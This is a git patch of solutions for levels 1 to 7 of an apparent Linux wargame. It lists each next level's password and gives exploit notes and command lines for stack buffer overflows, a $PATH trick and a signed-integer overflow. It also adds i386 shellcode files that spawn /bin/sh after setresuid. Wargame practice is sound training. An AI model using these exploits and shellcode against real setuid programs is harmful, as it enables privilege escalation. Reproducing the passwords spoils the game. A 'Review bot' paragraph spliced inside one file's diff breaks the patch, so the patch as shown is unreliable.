From 62d1287693cbb282570c52f44bfcc0be0e590d7f Mon Sep 17 00:00:00 2001 From: Iru Cai Date: Fri, 5 Oct 2018 17:41:48 +0800 Subject: level 1~7, shellcode --- level01 | 2 ++ level02 | 8 ++++++++ level03 | 4 ++++ level04 | 7 +++++++ level05 | 4 ++++ level06 | 22 ++++++++++++++++++++++ level07 | 15 +++++++++++++++ shellcode/exec-reloc-nozero.S | 10 ++++++++++ shellcode/exec-reloc.S | 11 +++++++++++ shellcode/exec-suid.S | 21 +++++++++++++++++++++ shellcode/exec-suid.asm | 19 +++++++++++++++++++ shellcode/exec.S | 8 ++++++++ shellcode/exec.asm | 8 ++++++++ 13 files changed, 139 insertions(+) create mode 100644 level01 create mode 100644 level02 create mode 100644 level03 create mode 100644 level04 create mode 100644 level05 create mode 100644 level06 create mode 100644 level07 create mode 100644 shellcode/exec-reloc-nozero.S create mode 100644 shellcode/exec-reloc.S create mode 100644 shellcode/exec-suid.S create mode 100644 shellcode/exec-suid.asm create mode 100644 shellcode/exec.S create mode 100644 shellcode/exec.asm
diff --git a/level01 b/level01
new file mode 100644
index 0000000..68c986d
--- /dev/null
+++ b/level01
@@ -0,0 +1,2 @@
+just disassemble it
+level02 XNWFtWKWHhaaXoKI
diff --git a/level02 b/level02
new file mode 100644
index 0000000..38f1ca9
--- /dev/null
+++ b/level02
@@ -0,0 +1,8 @@
+level2:
+abs(0x80000000) = 0x80000000 is still negative
+0x80000000/(-1) will trigger a division exception
+
+level2_alt:
+note that NAN is not smaller or higher than any number
+
+level03 OlhCmdZKbuzqngfz
diff --git a/level03 b/level03
new file mode 100644
index 0000000..3fe4a90
--- /dev/null
+++ b/level03
@@ -0,0 +1,4 @@
+just a buffer overflow
+note that if the input is too long, it'll override the value of argv, which will cause a segfault when trying to get the value of argv[1]
+
+level04 7WhHa5HWMNRAYl9T
diff --git a/level04 b/level04
new file mode 100644
index 0000000..9f01fcb
--- /dev/null
+++ b/level04
@@ -0,0 +1,7 @@
+level04:
+just modify $PATH
+
+level04_alt:
+the IFS attack seems not working, someone said using shellshock
+
+level05 DNLM3Vu0mZfX0pDd
diff --git a/level05 b/level05
new file mode 100644
index 0000000..22154c5
--- /dev/null
+++ b/level05
@@ -0,0 +1,4 @@
+buffer overflow, stack is randomized, put shellcode after return address and pad nops
+shellcode: should use setresuid first
+
+level06 fQ8W8YlSBJBWKV2R
diff --git a/level06 b/level06
new file mode 100644
index 0000000..9e18250
--- /dev/null
+++ b/level06
@@ -0,0 +1,22 @@
+考虑到栈地址随机化,而
+struct UserRecord{
+ char name[40];
+ char password[32];
+ int id;
+};
+只有72字节的空间可供攻击者填写,因此考虑将shellcode置于环境变量中。
+经过调试发现,环境变量放在 0xc0000000 之前的区域中,假设原环境变量共有 X 字节,则只要在环境变量中写一段 ``X字节nop + shellcode + X字节nop``,把栈溢出的返回地址改写为
+0xc0000000 - 2X - size(shellcode),那么便可以执行环境变量中的 shell code. 通过 ``env | wc -c`` 可看出环境变量小于 512 字节,让 X 为 512 即可。
+此外 greeting 到 ebp 处的距离为 0x48 字节,加上 old ebp 和返回地址为 0x50 = 80 字节,而我们只能往 UserRecord 写 72 字节,因此需要将 LANG 设为 fr 或 de 使得 greeting 开头更长一些。
+
+r2 malloc://2048
+[0x00000000]> 512 wxs 90
+[0x00000200]> wxs 31c004c9cd8089c389c189c231c004d0cd8031c0040bbb1f43583081f33030303053682f62696e89e331c931d2cd80
+[0x0000022f]> 512 wxs 90
+[0x0000042f]> wtf /tmp/shell.bin 0x42f @ 0
+
+export A=`cat /tmp/shell.bin`
+export LANG=de
+/levels/level06 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa `printf '0123456789012345678901234\xc0\xfb\xff\xbfaaaaa'`
+
+level07 U3A6ZtaTub14VmwV
diff --git a/level07 b/level07
new file mode 100644
index 0000000..36a0bc8
--- /dev/null
+++ b/level07
@@ -0,0 +1,15 @@
+注意以下代码中 count 是有符号数,只要使 count 为负数,而 count * sizeof(int) 为一个比较小的整数,则既能绕过 count >= 10 的检测,又能使程序正常运行::
+
+ int count = atoi(argv[1]);
+ int buf[10];
+ if(count >= 10 )
+ return 1;
+ memcpy(buf, argv[2], count * sizeof(int));
+
+经过逆向,buf 的地址是 ebp-0x48,count 的地址是 ebp-0xc,因此一共需要写 0x40 字节。我们让 count = 0x80000000 | (0x40 / sizeof(int)) = 0x80000010 = -2147483632 即可。
+
+顺便说一下,这关通过的条件是 count == 0x574f4c46,就是字符串 FLOW,暗示了是整数溢出。
+
+/levels/level07 -2147483632 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abFLOW
+
+level8 VSIhoeMkikH6SGht
diff --git a/shellcode/exec-reloc-nozero.S b/shellcode/exec-reloc-nozero.S
new file mode 100644
index 0000000..f5e2765
--- /dev/null
+++ b/shellcode/exec-reloc-nozero.S
@@ -0,0 +1,10 @@
+.global _start
+_start:
+ xorl %eax,%eax
+ addb $11, %al
+ movl $0x3058431f, %ebx
+ xorl $0x30303030, %ebx # "/sh\0"
+ pushl %ebx
+ pushl $0x6e69622f # "/bin"
+ movl %esp, %ebx
+ int $0x80
diff --git a/shellcode/exec-reloc.S b/shellcode/exec-reloc.S
new file mode 100644
index 0000000..077babb
--- /dev/null
+++ b/shellcode/exec-reloc.S
@@ -0,0 +1,11 @@
+.global _start
+_start:
+movl $11, %eax
+call next
+next:
+movl (%esp), %ebx
+addl $(_cmd-next), %ebx
+int $0x80
+_cmd:
+.ascii "/bin/sh"
+.byte 0
diff --git a/shellcode/exec-suid.S b/shellcode/exec-suid.S
new file mode 100644
index 0000000..94ec68a
--- /dev/null
+++ b/shellcode/exec-suid.S
@@ -0,0 +1,21 @@
+.global _start
+_start:
+ xorl %eax, %eax
+ addb $201, %al # geteuid
+ int $0x80
+ movl %eax, %ebx
+ movl %eax, %ecx
+ movl %eax, %edx
+ xorl %eax, %eax
+ addb $208, %al # setresuid
+ int $0x80
+ xorl %eax, %eax
+ addb $11, %al
+ movl $0x3058431f, %ebx
+ xorl $0x30303030, %ebx # "/sh\0"
+ pushl %ebx
+ pushl $0x6e69622f # "/bin"
+ movl %esp, %ebx
+ xorl %ecx, %ecx
+ xorl %edx, %edx
+ int $0x80
diff --git a/shellcode/exec-suid.asm b/shellcode/exec-suid.asm
new file mode 100644
index 0000000..b978195
--- /dev/null
+++ b/shellcode/exec-suid.asm
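Review bot: shellcode/exec-reloc-nozero.S declares no assembler syntax, target or ABI, and the same holds for exec-reloc.S, exec-suid.S, exec.S and the Intel-syntax exec-suid.asm and exec.asm; a reader has to infer i386 Linux from the register names and the `int $0x80` trap form. A header comment at the top of each file, `# i386 Linux, AT&T syntax; syscall via int $0x80: eax = number, ebx/ecx/edx = args 1-3` (with `;` comments in the NASM files), would make them self-describing. In exec-suid.S the comments `# geteuid` and `# setresuid` name the generic calls, but 201 and 208 are the i386 geteuid32 and setresuid32 table entries, so the comments should read `# geteuid32` and `# setresuid32`. The remaining bare numbers — 11 in the `addb`/`movl` operands here and in exec-reloc.S, exec.S and exec-suid.asm, and the `0x70`/`0x65` pair in exec.asm — carry no name at all; `.equ SYS_execve, 11` (or `SYS_execve equ 11` in NASM) used in the operand, or at least an `# execve` comment on each, would document them.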
@@ -0,0 +1,19 @@
+xor eax, eax
+add al, 201
+int 0x80
+mov ebx, eax
+mov ecx, eax
+mov edx, eax
+xor eax, eax
+add al, 208
+int 0x80
+xor eax, eax
+add al, 11
+mov ebx, 0x3058431f
+xor ebx, 0x30303030
+push ebx
+push 0x6e69622f
+mov ebx, esp
+xor ecx, ecx
+xor edx, edx
+int 0x80
diff --git a/shellcode/exec.S b/shellcode/exec.S
new file mode 100644
index 0000000..660057b
--- /dev/null
+++ b/shellcode/exec.S
@@ -0,0 +1,8 @@
+.global _start
+_start:
+movl $11, %eax
+leal _cmd, %ebx
+int $0x80
+_cmd:
+.ascii "/bin/sh"
+.byte 0
diff --git a/shellcode/exec.asm b/shellcode/exec.asm
new file mode 100644
index 0000000..ca8960d
--- /dev/null
+++ b/shellcode/exec.asm
@@ -0,0 +1,8 @@
+mov al, 0x70
+sub al, 0x65
+mov ebx, 0x30584361
+xor ebx, 0x3030304e
+push ebx
+push 0x6e69622f
+mov ebx, esp
+int 0x80
-- cgit v1.2.3